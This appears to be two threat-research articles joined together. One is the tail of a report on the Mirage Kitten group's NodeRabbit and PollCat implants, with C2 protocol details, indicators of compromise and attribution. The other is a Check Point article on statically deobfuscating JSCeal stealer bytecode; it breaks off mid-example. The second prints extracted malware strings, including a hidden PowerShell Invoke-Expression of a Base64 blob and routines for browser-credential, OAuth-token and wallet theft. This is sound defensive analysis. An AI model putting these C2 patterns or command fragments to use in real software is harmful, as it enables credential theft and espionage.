healthfullyrecipes[.]com 2026-06-30 NameCheap, Inc. refreshhealthandwellness[.]com 2026-06-09 NameCheap, Inc. healthvitalitycare[.]com 2026-05-18 NameCheap, Inc. aceofspadesmanagement[.]com 2026-05-18 NameCheap, Inc. glmediaagency[.]com 2026-05-18 NameCheap, Inc. digimediaskill[.]com 2026-05-18 NameCheap, Inc. healthyweightplan[.]com 2026-05-18 NameCheap, Inc. mens-health-online[.]com 2026-05-15 NameCheap, Inc. Victims Based on our telemetry, we identified victims in fintech, aviation and aerospace sectors across the Middle East and Africa – specifically, in Egypt, Ethiopia and Afghanistan. We also observed submissions of ZIP archives with trojanized projects containing NodeRabbit and PollCat to an online multi-scanner originating from several countries, including India, Türkiye, Israel, Iraq, Germany, and Ireland. Attribution We attribute this activity to Mirage Kitten with a high degree of confidence based on the following observations: Structural similarities with the Retrograde/ MiniFast native DLL backdoor (MD5: 810F8E3B88EB05F710C09552941D6F56 ) Initial C2 handshake and session establishment logic. Both PollCat and Retrograde/MiniFast follow a similar C2 handshake flow. Each builds a JSON request body containing host information and sends it via an HTTP POST request. Notably, both treat HTTP 400 as a successful handshake response rather than an error, parsing the response body to extract a socketId , which is then stored and used as the session token for subsequent C2 communication. Similar C2 handshake and socketId session establishment logic in MiniFast/Retrograde and PollCat Host registration. Both PollCat and Retrograde/MiniFast register the infected host with the C2 server by sending a structurally similar JSON request body containing the session token and host information. Malware Host registration request body C2 endpoint PollCat {“token”:”<socketId>”,”pcName”:”<host>”,”userName”:”<user>”,”domainName”:”<domain>”,”os”:”<os>”,”isElevated”:false} /gate/hello MiniFast/Retrograde {“token”:”<socketId>”,”pcName”:”<host>”,”userName”:”<user>”,”domainName”:”<USERDOMAIN>”,”isElevated”:<bool>} /agent/init Command fetching similarities. The similarities extend to command retrieval. Both PollCat and Retrograde/MiniFast periodically poll the C2 server using an HTTP GET request containing the previously assigned socketId as a token. Retrograde/MiniFast uses GET /agent/poll?token=<socketId> , while PollCat follows the same pattern with GET /gate/fetch?token=<socketId> , demonstrating a closely aligned C2 communication structure. Beacon timing similarities. PollCat and the Retrograde/MiniFast share identical beacon timing defaults: a polling interval of 120,000 ms ( 0x1D4C0 ), a jitter of 5,000 ms ( 0x1388 ), and a retry timeout of 60,000 ms ( 0xEA60 ). This further highlights the structural similarities between the two C2 communication implementations. Command set similarities. PollCat and Retrograde/MiniFast share several commands and command IDs. Notably, PollCat declares REQUEST_ELEVATION (0xB0) and PERSIST (0xB1) but does not implement them. In MiniFast, both are functional: 0xB0 performs UAC elevation, while 0xB1 creates the WindowsSecurityUpdate scheduled task for persistence. Command set similarities between MiniFast/Retrograde and PollCat, including shared command identifiers Proxy authentication similarities. NodeRabbit delegates corporate-proxy NTLM/Negotiate authentication to curl.exe --proxy-anyauth --proxy-user , using the victim’s logon session. Retrograde/MiniFast native DLL implements the same approach natively through WinHttpQueryAuthSchemes and WinHttpSetCredentials with NULL credentials. This shared proxy-aware C2 design suggests the same development approach across both malware families. Speaking of victimology, the attacks are consistent with Mirage Kitten’s known geographic targeting, with the group maintaining a strong focus on entities across Africa and the Middle East, this time with a particular focus on the aviation and FinTech sectors. As for the operational infrastructure, Mirage Kitten has historically hosted its initial ZIP lures on legitimate third-party services. Previously, it used onlyoffice.com for this purpose. In this activity, the group shifted to Amazon S3 buckets. Finally, the combination of Azure Websites and Cloudflare‑backed domains has been a hallmark of Mirage Kitten’s TTPs, which we have observed across NodeRabbit and PollCat. Conclusions Mirage Kitten’s latest activity marks a notable evolution in the group’s tooling: NodeRabbit and PollCat are the group’s first Node.js/JavaScript-based implants, departing from its usual native malware deployed through DLL search-order hijacking. The shift to cross-platform scripting gives the operators a single codebase that runs on Windows, Linux, and macOS, with payloads that blend naturally into developer workstations. The delivery mechanism, however, remains consistent with Mirage Kitten’s historical tradecraft: the use of recruiter personas on LinkedIn to target critical sectors across the Middle East and Africa for cyberespionage purposes. We continue to track the group’s activity and will report on new developments in future publications. Indicators of compromise Additional IoCs are available to customers of our Threat Intelligence Reporting service. For more details, contact us at [email protected] . File hashes CBAAF0900A13F28E380F49ADECEC932C   FrontEnd-Task.zip 1EA83E4E4592B01E4ACAB63EB867BEE5   Front-Technical-Challenge.zip 366515822D5AC1CC500711EF57A2E32E   Task-FullStack.zip CF449F1992C2819E62AC44A0B06AC2E7   fullstack-1536.zip E95A4366686E3F786EA3C056FAB5B0DA   webapp76592.zip DE5AF16A3757EF700B01DC34D67079AE   webapp76531.zip BE086789568441D0D7E4679AEE51F566   challenges-17831.zip E259C5EDF158AAC4CFE14F77DDD0B196   challenges-17832.zip 291AC3ABE73C5158E59A437B75D5F0AA   Project-1802.zip 0962F56D7EC69F4F2A0162DCBE22116B   Case-34234.zip 795E053A990A1569FFDCB57F48F6D085   RankChallenge-react-6uJSX3-main.zip Domains and IPs oracle-challenge.s3[.]us-east-1.amazonaws[.]com naturalapplication.azurewebsites[.]net retaildemo.azurewebsites[.]net tubitak.azurewebsites[.]net rgbteller.azurewebsites[.]net wslwebui.azurewebsites[.]net plugplay.azurewebsites[.]net crossdwm.azurewebsites[.]net wdisystem.azurewebsites[.]net wslmenus.azurewebsites[.]net dnshnsdev.azurewebsites[.]net hpjumpsrv.azurewebsites[.]net storview.azurewebsites[.]net healthcomfsdpower[.]com visitfinancedentists[.]com kyrasey-f8hfexa5cqamh7fk.westeurope-01.azurewebsites[.]net greenyjsgfd.azurewebsites[.]net helptellerbls.azurewebsites[.]net timedrv.azurewebsites[.]net userwellgtfs.azurewebsites[.]net hecowime-aqdphyd4bbdef6es.westeurope-01.azurewebsites[.]net msmanagementgrp[.]com msmanagementgrpmedia[.]com lifespotify[.]com gamebarapp.azurewebsites[.]net gamebarappinformation.azurewebsites[.]net sahi-finance[.]com healthful-hub[.]com neumedicahealthcare[.]com optimumhealthcredit[.]com healthfullyrecipes[.]com Refreshhealthandwellness[.]com healthvitalitycare[.]com aceofspadesmanagement[.]com glmediaagency[.]com digimediaskill[.]com healthyweightplan[.]com mens-health-online[.]com
securelist.comSep 1, 2026extracted
Breaking the Seal: Static Deobfuscation of JSCeal’s Compiled V8 Bytecode
Research by:   hasherezade Key Points Since early 2025, Check Point Research has been tracking JSCeal, a sophisticated cryptocurrency-focused stealer with broader credential-theft, surveillance, and traffic-interception capabilities, delivered as compiled V8 bytecode (JSC files). The payloads are protected with  javascript-obfuscator , using multiple techniques including RC4-protected strings, control-flow flattening, proxy functions, and operation wrappers. Our goal was to recover the code to a level that enables detailed analysis, comparison between samples, and tracking of the malware’s evolution. CPR developed a fully static deobfuscation pipeline that transforms View8 pseudocode without executing the malware. An optional LLM-assisted renaming stage can then be used to make large, recovered codebases easier to navigate. The complete toolkit is publicly available at  jsc_deobfuscator . The deobfuscated output enabled detailed analysis of JSCeal’s capabilities and their implementation, including keylogging, browser and credential theft, and HTTPS traffic interception through a local MITM proxy. We  presented this research at Black Hat USA 2026 . This article complements the talk by documenting the methodology in greater technical depth and providing additional examples and implementation details. We conclude with a brief look at more recent JSCeal developments, including V8 code caches generated for a newer Node.js/V8 version, an additional payload-encryption layer, and macOS targeting. Introduction JSCeal is a stealer delivered as compiled V8 bytecode ( .jsc ) and executed by a bundled Node.js runtime, targeting cryptocurrency applications (other vendors also tag it with the names WEEVILPROXY or MeadowLocust). Its campaign activity dates back to March 2024 [ 1 ]; Check Point Research has been tracking the malware since early 2025. Our previous publication from July 2025 [ 1 ] focused on the campaigns, delivery chain, and targeting. In this article, we focus on the analysis problem hidden inside the final payload. Unlike ordinary JavaScript malware, JSCeal reaches the analyst after two transformations have already removed much of the information that source-oriented tools depend on. First, the JavaScript is heavily obfuscated. Then it is compiled into V8’s internal bytecode representation and shipped as cached data rather than source code. The resulting format is version-specific, poorly served by mature reverse-engineering tooling, and unsuitable for most standard JavaScript deobfuscation workflows. From the attacker’s perspective, this combination is attractive because it is inexpensive to produce. Node.js and its package ecosystem provide ready-made building blocks for complex applications, while public tools such as  javascript-obfuscator  [ 6 ] can add several layers of source-level obfuscation before compilation. The analyst receives only the compiled artifact. In 2024, our colleague Moshe Marelus published  View8 , an open-source decompiler for V8 bytecode [ 2 ]. We used it as the foundation for a static deobfuscation pipeline tailored to the patterns found in JSCeal. During this work, we extended View8 [ 3 ] to make its output reproducible and suitable for automated post-processing, and implemented dedicated passes for value propagation, string reconstruction, control-flow unflattening, proxy and operation-wrapper resolution, and additional cleanup. The goal is not perfect source recovery — V8 compilation is lossy, and the output of decompilation remains pseudocode. Instead, we aimed to recover enough structure and semantics to read the malware as code again: follow its logic, compare samples, locate capability branches, and validate behavior against concrete strings, APIs, paths, and data flow. Later in the article, we use one selected JSCeal payload as a case study and walk through portions of the recovered code, including browser and cryptocurrency theft, keylogging, screenshot capture, and a local HTTPS interception proxy. Distributed payloads Let’s start by understanding the role of the JSC files in the whole attack chain. The payloads were delivered in campaigns that began with malvertising and were followed by multiple PowerShell scripts. The complete flow is illustrated below: Figure 1 – The final stage infection flow (image first presented in [ 1 ]) The last stage consists of two ZIP archives downloaded by PowerShell: node.zip  – a packaged Node.js runtime build.zip , containing the final payload and supporting components: winpty-agent.exe  – an agent for a hidden Windows console ( open source ) winpty.dll  – a module that allows interaction with the hidden console ( open source ) app.jsc  – The JSCeal malware payload preflight.js  – a decompression script Native  .node  modules (PE format) used by the payload The final JSC payload is distributed in Brotli-compressed [ 5 ] form and decompressed by  preflight.js . The loading is triggered by the last PowerShell script in the chain, containing the command line: .\node.exe -r .\preflight.js .\app.jsc  (the option  -r  forces Node to run a JS file  before  loading the main module). The size and complexity of the JSC payloads varied. They were all obfuscated with the same open-source obfuscator [ 6 ]. Analysis methodology While typical analysis procedures were sufficient for the earlier stages, the final JSC payload remained challenging. Because it was delivered as a V8 code cache rather than JavaScript source, conventional source-level JavaScript instrumentation was not directly applicable. Native-level hooking and dynamic binary instrumentation (DBI) could reveal process and API activity, but did not recover the payload’s JavaScript-level semantics at a useful level. Sandbox execution therefore provided mainly low-level system-interaction telemetry. To understand the payload’s logic, we turned to static analysis, which required deobfuscation. Since the JSC payload is Brotli-compressed, the first step is to remove this layer. This yields the V8 code cache, which can then be supplied to a compatible disassembler. The disassembled output is then passed to the View8-based pipeline, which includes decompilation and transformation by multiple deobfuscation passes. Each pass can be used as a self-contained script. To support modularity, we extended View8 with  pickle serialization  of its internal object graph. We also added function-level visibility controls and metadata annotations (details in  Appendix A ). Figure 2 – the pipeline demonstrating steps applied to the original JSC sample Our toolkit is publicly available at https://github.com/hasherezade/jsc_deobfuscator [ 7 ] The following flowchart describes the major steps of the pipeline; details of each follow in subsequent sections. Figure 3 – the flowchart of the deobfuscation pipeline We applied the pipeline to 23 JSCeal payloads collected over several months ( Appendix B ); it produced analyzable output in all cases. Environment Setup The toolkit used for the main body of this research was developed on Linux. The JSCeal generation analyzed in depth in this research used a bundled Node.js runtime based on V8  10.2.154.26-node.25 . The distributed  app.jsc  was Brotli-compressed; after decompression, the resulting file was a V8 code cache that could be supplied to a compatible disassembler. V8 cached data is version-sensitive, so before decompilation we first need to obtain a correct bytecode listing. We followed the general approach used by the View8 fork from j4k0xb [ 4 ]: build the corresponding V8 version, apply the required patches, and use a small program based directly on the V8 API to consume the cache. During this process, we encountered a bug in the original V8 code that caused a string-printing problem and corrupted some disassemblies containing wide characters. It passed a 16-bit code unit through byte-oriented printable-character handling, which could inject malformed output into string literals and break View8 downstream. We patched the printer so that printable ASCII remains literal, byte-sized non-printable values use  \xNN , and wider values are emitted as  \uNNNN . The patch is included in the public repository [ 9 ], and the complete build procedure is documented on the project Wiki [ 10 ]. The released toolkit contains both the disassembler source and the V8 patches required for the supported generation. A prebuilt Linux disassembler is also distributed with the project [ 7 ]  release . Decompiled output Once we have the correct disassembly, we can proceed with decompilation. However, there are some details to keep in mind. View8 does not reconstruct the original JavaScript source. It lifts V8 bytecode into pseudocode that reflects its underlying execution model. Recovered functions are represented in a form such as: function func_[name]_0xdisassembly_address The entry point is a function labeled  start , for example:  func_start_0x323d9daddcd9 . In ordinary View8 output, the hexadecimal suffix is derived from address values emitted during disassembly. Because these values may differ between runs, our modified View8 can normalize function identifiers deterministically based on parse order. This makes the results reproducible (details:  Appendix A ). The pseudocode follows the underlying V8 concepts rather than ordinary JavaScript local-variable names. Each function can make use of its arguments, the accumulator, and a set of local virtual registers. It also has access to its own constant pool, global variables, and context storage exposed through  Scope . Function arguments are represented as  a0  to  aN , while local virtual registers are printed as  r0  to  rN .  ACCU  denotes the current V8 accumulator value. Functions can declare nested functions and share values with them through their surrounding context. In View8, these relationships are visible through the declarer hierarchy and  Scope[...]  references. Values placed into a scope by a declarer function may later be consumed by nested functions. Reconstructing those relationships is essential for JSCeal because the obfuscator frequently moves constants, decoder offsets, proxy references, and dictionary objects through scope rather than keeping them local. As the root of the function hierarchy, the  start  function is the only function without a declarer. The start function also initializes the global bindings used throughout the program. In raw View8 output this is visible through  DeclareGlobals , for example: ACCU = DeclareGlobals(["oQ", "kg", "xQ", func_yz_0x323d9daeb509, 893, [...] ]) For readability, our modified View8 marks global identifiers explicitly with a  global_  prefix. The prefix prevents collisions with local register notation and makes later propagation easier to follow. Since the original JavaScript was obfuscated before compilation, the View8 output contains artifacts introduced by the obfuscator, making the recovered pseudocode considerably harder to interpret. A detailed explanation of each obfuscation layer and the applied countermeasures is provided later in this article. For example, a single function from a JSCeal payload decompiled by View8 looks like this: function func_unknown_0x398fa079bb71(a0) { r2 = Scope[19][74][func_Ht_0x398fa0799da9(136760, "ZCe3")] r2 = r2(a0) r3 = func_Ht_0x398fa0799da9(57973, "Vbp&") r3 = (r3 + func_Ht_0x398fa0799da9(194117, "Af5z")) r3 = (r3 + func_Ht_0x398fa0799da9(86681, "XDjZ")) r1 = r2[(r3 + func_Ht_0x398fa0799da9(100990, "5Yvr"))] r1 = r1() r2 = func_Ht_0x398fa0799da9(75831, "b6Sj") r0 = r1[(r2 + func_Ht_0x398fa0799da9(49188, "Amc*"))] return r0() } This is already significant progress compared with the raw bytecode, but the remaining obfuscation still makes most of the output effectively unreadable. The rest of the pipeline progressively removes those layers and transforms the output into pseudocode suitable for practical analysis. One syntax detail is worth keeping in mind throughout the article: View8 uses its own pseudocode notation and should not be interpreted as literal JavaScript. For example, an expression such as  !r6 === "0"  represents the negation of the entire comparison — semantically:  r6 !== "0" . Obfuscation layers The analyzed JSCeal payloads were protected with  javascript-obfuscator  [ 6 ]. Its configuration is highly customizable, and the exact combination varied between samples. Across the corpus, we repeatedly observed four groups of transformations: Renamed identifiers.  Function and variable names are replaced with short or nonsensical identifiers. String protection.  Important strings are split into chunks and reconstructed through decoder functions. In the dominant variant observed in JSCeal, the stored chunks are encoded and RC4-protected. Control-flow flattening.  Selected functions are transformed into state machines whose intended block order is hidden behind a dispatcher. Proxy and operation indirection.  Function calls are forwarded through proxy helpers, while simple operations such as addition, subtraction, comparison, or function invocation are wrapped in dedicated helper functions. The deobfuscation pipeline has to follow a specific order because the result of one pass can expose information required by the next. For example, string deobfuscation reveals not only the text used in the code, but also keys for dictionaries containing variables and function references. Propagating values Before we can start peeling away the obfuscation layers, we need to set the stage by propagating the variables used in the code and performing all the necessary simplifications. Often, functions that we have to parse and resolve are not called directly, but through different variables: globals, scopes, or local registers. A similar problem applies to their arguments. Until we have everything filled and mapped, it won’t be possible to really understand the flow. Propagating values is non-trivial: it is done in multiple ways, at different layers of the obfuscation process. Demonstrating the full variety used would take too much space, so let’s focus on a few examples. We illustrate with string decryption functions here, but the same propagation logic applies to proxy resolution and operation inlining described later. Details on the actual string deobfuscation are given in the next section, “Reconstructing strings”. Below is a tiny function used to deobfuscate a chunk of a string. The input argument ( a1 ) is modified by a value passed via Scope. function func_r_0x24543eceeb91(a0, a1) { r1 = (a1 - Scope[10083][2]["c"]) return func_mt_0x3120801469(r1, a0) } Without knowing the actual value, we won’t be able to do the calculation required for deobfuscation. The scope is filled by a function higher in the declaration hierarchy. Once we find the particular line, we are ready to fill it. function func_yZ_0x24543ecedfc9(a0) { [...] Scope[10083][2] = new {"c": 742} [...] After the substitution, we get: function func_r_0x24543eceeb91(a0, a1) { r1 = (a1 - 742) return func_mt_0x3120801469(r1, a0) } In this form, the function is ready to be parsed, and we can see that the value  742  is subtracted from the input argument. Another problem is that in many parts of the code, calls to interesting functions have their arguments passed via local variables. While parsing a line, it is not immediately clear what arguments are being passed. In the given example, the function deobfuscating a string chunk,  func_r_0x24543eceeb91 , is called with two arguments that are passed via dictionaries. We first collect those dictionaries, and then substitute their uses with corresponding values. Before: r0 = new {"c": "SwH7", "n": 84197, "x": "PEKM", "Y": 104422, ...} [...] r7 = func_r_0x24543eceeb91(r0["c"], r0["n"]) r7 = (r7 + func_r_0x24543eceeb91(r0["x"], r0["Y"])) After: r7 = func_r_0x24543eceeb91("SwH7", 84197) r7 = (r7 + func_r_0x24543eceeb91("PEKM", 104422)) Once those preparations are completed, we are ready to parse the functions and resolve their outputs. Reconstructing strings String reconstruction is the first major deobfuscation stage. Strings are valuable artifacts on their own: they expose API names, paths, commands, URLs, object fields, and targeted services. More importantly for this pipeline, they also unlock later transformations. Recovered strings become dictionary keys, property names, and control-flow order sequences used by the unflattening and proxy-resolution passes. The analyzed samples used two string-obfuscation variants provided by  javascript-obfuscator  [ 6 ]. We implemented [ 7 ] a separate pass for each. The simpler variant, addressed by  deobf_str1.py , stores string fragments in an array and retrieves them through an index transformation. It appeared only in an older sample. The dominant variant, addressed by  deobf_str2.py , adds several more layers: encoded string chunks, RC4 encryption, a large family of decoder wrappers, and arithmetic transformations of the chunk index. This is the variant described below. Details on deobfuscation modes used by each payload are listed in  Appendix C . The string obfuscation rabbit-hole Let’s take a closer look at how the most common JSCeal string obfuscation is implemented. This is the mode addressed by  deobf_str2.py . Just like in the simplest mode, each string is split into chunks. Then, each chunk is RC4 encrypted with a different key. The resulting content is Base64-encoded. Such obfuscated chunks are accumulated in a single array, stored inside one of the functions, and retrieved from there into a global scope. It is initialized in the start function. An example of how the function holding the array of chunks may look is given below (keep in mind that the array may contain thousands of elements): function func_KV_0x18c3e8c9a1c1() { r0 = Scope[0] Scope[10824][2] = new ["s8ohWR3dRx8", "ffddSSo6sW", ... ] } When the program needs a string, it calls one of many decoder functions. A typical call contains a numeric value and a short RC4 key: r2 = func_xt_0x274f42c4e909(71692, "%]hf") The argument order is varied: some decoder functions receive  (number, key) , while others receive  (key, number) . The number is used to calculate the index of the chunk to be decrypted, relative to the aforementioned global list. The calculation is done inside the function. To make things more complex, deobfuscation is done not just by one function, but by many similar instances. The instances may call one another, each one of them adding or subtracting a different value to the input argument. In order to calculate the actual chunk index, we have to follow the whole chain of functions, parse them, and repeat the operations they performed. At the end of the chain there is always a strongly obfuscated parent function that contributes the final operation. The values used in calculations are not hard-coded in the function but passed via scope (details described in “Propagating values”). Example of a single deobfuscating function: function func_r_0x7b2a9768611(a0, a1) { r1 = (a1 - Scope[1][2]["V"]) return func_xt_0x274f42c4e909(r1, a0) } In the above case, the index was passed via argument  a1 . The value retrieved from the scope is first subtracted from it. The result, along with the argument  a0  representing the RC4 key, is passed to the next deobfuscation function ( func_xt_0x274f42c4e909 ) which performs similar operations. The chain of similar calls follows multiple layers until it reaches the parent function which adds or subtracts the final value from the index, retrieves the chunk from the global array, and performs the decryption operation. Recovering the root offset As mentioned earlier, at the top of the chain of different deobfuscating functions that call one another, there is always an obfuscated parent. Instead of deobfuscating it, we decided to treat it as a black box. Recovering its index shift involves several steps. The parent functions are the first string decoding functions to be declared, and in the start function, they may be called directly. Just like in the case of their children, two arguments are expected: the RC4 key, and the number used for index calculation. Once we have found the parent, we track its direct calls and collect the arguments. We know that the chunk index is obtained by an arithmetic operation (addition or subtraction) on the passed number. We can express it as: index = arg (+|-) X The goal is to find the correct X (index shift). Since this value is used to calculate the index of the chunk, the upper bound is the number of chunks in the array (N). We test candidate shifts from  0  to  N-1 , apply each to the input index, and attempt to decrypt the resulting chunk. If the output looks like a valid string, we treat that X as the index shift candidate. Conceptually: for candidate_shift in 0 .. N-1: candidate_chunk = array[(input_index + candidate_shift) mod N] plaintext = RC4(candidate_chunk, key) if plaintext looks plausible: keep candidate_shift A plausible result from a single call is not enough: an invalid chunk can occasionally produce printable text when decrypted with the given key. The implementation therefore requires  at least three distinct input/output observations for the same decoder function.  It computes the candidate shifts per set, intersects those sets, and accepts the value only when it produces a printable result for each. In all the analyzed payloads this condition was sufficient to find the appropriate index shift. This can be viewed as a bounded brute-force search. The implementation tests possible index shifts within the string-array length and uses multiple independent calls to eliminate candidates that do not produce consistent printable results. Once the root configuration is known, the pass propagates the index shift through the collected function graph to the callers, calculating the cumulative index delta applied by each individual decoder. Overview of the string deobfuscating pass The string deobfuscation pass requires all arguments to be filled, as described in “Propagating values”. It works in the following steps: Retrieves the start function Searches for the function aggregating obfuscated string chunks. It is always referenced by the start function and can be spotted by a known pattern of the call. Example: ACCU = func_unknown_0x93e23cef019(func_KV_0x18c3e8c9a1c1, 940600) Follows and parses the function with chunks (in the above case:  func_KV_0x18c3e8c9a1c1 ). Stores the list for further use. Searches all the string decoding functions, recovers the parent index shifts, and calculates the resulting index shift for each decoder function. The input arguments can be arranged in two ways: either  Rc4Key, Offset  or  Offset, Rc4Key  – this is recognized and added to the function prototype. r2 = (r2 + func_xt_0x274f42c4e909(99288, "h^gm")) //Offset, Rc4Key After the first run, the deobfuscator stores parsed and calculated arguments in a CSV file. If the pass has to be re-run, the list is pre-loaded, which saves time. Example of the listing (format:  function_name,index_shift,is_index_first ): func_xt_0x274f42c4e909,125103,True func_Et_0x1d8d5672d829,125093,False func_u_0x3fa27d771f29,125016,True func_r_0x93e23cf1d91,125126,True func_n_0x93e23cf22a1,126086,True ... After all the deobfuscating functions have been resolved, each of their resolved occurrences is replaced with its output value. The deobfuscated chunks are then chained together to form the full string. - r5 = func_n_0x34d57d25f3b9(60787, "Bz&S") //"defau" r4 = xF[(r5 + "lt")] r4 = global_xF["default"] r5 = func_n_0x34d57d25f3b9(58819, "5C8Q") // "globa" r5 = (r5 + func_n_0x34d57d25f3b9(17159, "SldQ")) //"lAgen" return r4[(r5 + "t")] return r4["globalAgent"] After the deobfuscation is completed, the functions responsible for string decoding are no longer needed. Their representation is hidden in the code and not printed in the decompilation output. Scale and performance For the 23-sample dataset used in the final measurements [ 8 ], the string layer contained approximately: 130,000 encoded chunks on average , with observed values from about 19,000 to 217,000; 10,000 decoder configurations on average , with observed values from about 2,200 to 13,000. Measured runtime for the string stage was: modeminimummedianmaximumwithout cache0.6 min1.7 min4.6 minwith cache0.5 min1.2 min3.0 min After string reconstruction, the output contains both substituted plaintext and a standalone string listing. This is often the first point at which the payload starts exposing concrete artifacts such as commands, registry paths, browser targets, cryptocurrency platforms, and the attacker’s embedded public key. Artifact overview In addition to the main output of the pass (which is the decompiled and pickled file), the list of all the strings is dumped as text. It helps quickly give an idea of which functionalities are implemented, and to compare different payloads. Example   –   listing of strings extracted from a sample:  e27ae65977287bdfb7b0e15fd3603f85.deobf.txt.strings.txt Among the interesting artifacts, we can find the public key of the attackers: "\n-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtRdWl/ucoH+ZnVuxHrx2\ncTbwEY2LucyUqEJVl6trmNYaJTFX9qDYA8Z4VOaFO86MHg0cY1mJ8NALzTqDt20C\nlnqYtLEuo0Fqg9pJMhnEb078F31dilgdK+5bK7LgwXps06KQ+Dk7XxaqkbPFa7oZ\n73/q4FhrYEtBxFno0WJla7mq49/W4wJb753WYWTjRMjBKVaUIOtAtGdBp8Li2WX2\nPDqxftDcvT8hJf5H6tMJ3tQRpyHu7ljkwdivamG/labZpzKhijK7BMgrd7251sjh\n7zD6prnafayjK+nfD1dvok7Rd8TV8sa1FK8T0uMmGFdUVGK+X4f45AwNWn8OINLE\nVwIDAQAB\n-----END PUBLIC KEY-----" There are strings related to deploying hidden PowerShell scripts and running content from a Base64-encoded blob: "powershell -NoProfile -WindowStyle Hidden -Command \"" "Invoke-Expression ([System.Text.Encoding]::" ".GetString([System.Convert]::FromBase64String($_.unattend.Extensions." Multiple strings suggest that the malware enumerates installed browsers, and tries to query the saved secrets, cookies, OAuth tokens, and other data: "iterInstalledBrowsers" "getCookies" "application" "launch" "values" "createBrowserContext" "newPage" "setCookie" "getPasswords" "div[data-identifier=\"" "findInstalledBrowser" "--user-data-dir=" "--profile-directory=" "withCreateProcessUser" "user_id" "oauth_token" "google" "saveOAuthToken" "/oauth2/:version/token?grant_type=authorization_code&client_id=" It also queries all installed applications and targets Telegram accounts: "listTelegramSessions" "listInstalledApplications" To achieve its goals, it uses the capability to spawn additional processes: "Process exited with code " spawn It creates a local proxy server with its own certificate: "address" close "listen" "127.0.0.1" "createServer" pki rsa "generateKeyPair" "createCertificate" "publicKey" "serialNumber" "certificateToPem" Some strings are fragments of URLs for particular cryptocurrency vaults and are related to checking account balances: ".phantom-labs.vault." "totalBalanceInUSDT" "free_margin_usd" "floating_usd" "historical_balances_per_asset_category" "total_usd_market_value" "customer_account_USDT_balance_available" "binance" Many of the deobfuscated strings come from Node.js modules bundled into the payload and give an idea of what functionality to expect. Comprehensive analysis of all the artifacts is beyond this short overview. You can find the extracted strings from all analyzed samples in the directory with additional materials [ 8 ]. Control flow unflattening Some of the most important functions of the malware are obfuscated using Control Flow Flattening (CFF). To resolve this layer, we must make sure that all strings are deobfuscated and propagated, because they are crucial for the execution logic. In the listing produced by the previously described filter, we find some strings in the format  [number0]|[number1]|[number2]...  for example: “3|2|1|0|4”. Such strings denote an order of chunks to be executed. Typically, CFF is implemented as a state machine. We can see it represented by a while loop. In each iteration of the loop, the number is fetched from the list. This number is further checked against nested  if  statements, directing to the chunk of code to be executed. In the simplest form, a chunk ends with  continue , causing the loop to progress to another case. Example (from:  03f4e47b9c2283c32bb8f8f042ce6e41 ): function func_Mz_0x6035be98311(a0) { r5 = Scope[0] r2 = func_r_0x6035be98a69 Scope[6705][2] = new {"w": 1342} r6 = new {"jGBGz": null, "hBPBb": null, "qbyOP": null, "ykkYm": null, "SeAyf": null, "yHrsY": null, "umIdy": null, "RBgqe": null} r6["jGBGz"] = "3|2|1|0|4" r6["hBPBb"] = func_hBPBb_0x6035be990e9 r6["qbyOP"] = "wss" r6["ykkYm"] = func_ykkYm_0x6035be991e9 r6["SeAyf"] = func_SeAyf_0x6035be992e9 r6["yHrsY"] = "https" r6["umIdy"] = "http" r6["RBgqe"] = "Invalid protocol" r1 = r6 r7 = r1["jGBGz"] r6 = r7["split"] r3 = r6("|") r4 = 0 while (true) { r7 = Number(r4) r4 = (Number(r4) + 1) r6 = r3[r7] if (!r6 === "0") { if (!r6 === "1") { if (!r6 === "2") { if (!r6 === "3") { if (!r6 === "4") { continue } r7 = r1["hBPBb"] r10 = r1["qbyOP"] if (r7(a0, r10)) { r7 = global_Tb["default"] return r7["globalAgent"] } continue } r7 = r1["ykkYm"] if (r7(a0, "ws")) { r7 = global_Nb["default"] return r7["globalAgent"] } continue } r7 = r1["SeAyf"] r10 = r1["yHrsY"] if (r7(a0, r10)) { r7 = global_Tb["default"] return r7["globalAgent"] } continue } r7 = a0["split"] r7 = r7(":") a0 = r7[0] r7 = r1["hBPBb"] r10 = r1["umIdy"] if (r7(a0, r10)) { r7 = global_Nb["default"] return r7["globalAgent"] } continue } r8 = r1["RBgqe"] ACCU = Error ACCU = Error(r8) break } return undefined } We start the deobfuscation by identifying the beginnings and ends of each code chunk. For example, to find the chunk number 0, we first need to identify the if statement that actually checks against the negation of this condition:  if (!r6 === "0") . Once we find the statement, we have to skip the body under it (since it is a negation) and find the first closing bracket with the same indentation as the statement itself. This is where the chunk indexed as  0  actually starts. Once we have all the chunks mapped, we rearrange them by the order defined by the string, adjusting their indentations. The same function, unflattened: function func_Mz_0x6035be98311(a0) { r5 = Scope[0] r6 = new {"jGBGz": null, "hBPBb": null, "qbyOP": null, "ykkYm": null, "SeAyf": null, "yHrsY": null, "umIdy": null, "RBgqe": null} r6["hBPBb"] = func_hBPBb_0x6035be990e9 r6["qbyOP"] = "wss" r6["ykkYm"] = func_ykkYm_0x6035be991e9 r6["SeAyf"] = func_SeAyf_0x6035be992e9 r6["yHrsY"] = "https" r6["umIdy"] = "http" r6["RBgqe"] = "Invalid protocol" r1 = r6 r4 = 0 r7 = a0["split"] r7 = r7(":") a0 = r7[0] r7 = r1["hBPBb"] r10 = r1["umIdy"] if (r7(a0, r10)) { r7 = global_Nb["default"] return r7["globalAgent"] } r7 = r1["SeAyf"] r10 = r1["yHrsY"] if (r7(a0, r10)) { r7 = global_Tb["default"] return r7["globalAgent"] } r7 = r1["ykkYm"] if (r7(a0, "ws")) { r7 = global_Nb["default"] return r7["globalAgent"] } r7 = r1["hBPBb"] r10 = r1["qbyOP"] if (r7(a0, r10)) { r7 = global_Tb["default"] return r7["globalAgent"] } r8 = r1["RBgqe"] ACCU = Error ACCU = Error(r8) return undefined } For the sake of comparison, let’s see it with further deobfuscation filters applied: function func_Mz_0x6035be98311(a0) { r4 = 0 r7 = a0["split"] r7 = r7(":") a0 = r7[0] if (a0 === "http") { return global_Nb["default"]["globalAgent"] } if (a0 === "https") { return global_Tb["default"]["globalAgent"] } if (a0 === "ws") { return global_Nb["default"]["globalAgent"] } if (a0 === "wss") { return global_Tb["default"]["globalAgent"] } ACCU = Error ACCU = Error("Invalid protocol") return undefined } At this point the function’s intention becomes clear. It performs a lookup that returns the appropriate  globalAgent  for a given protocol. The caveats Sometimes, the chunks of code that are executed in each state are decompiled in a way that makes them difficult to separate cleanly. Let’s take a look at the following example: while (true) //The dispatcher loop { r15 = Number(r4) r4 = (Number(r4) + 1) r14 = r3[r15] if (!r14 === "0") { // Other chunks... // [...] 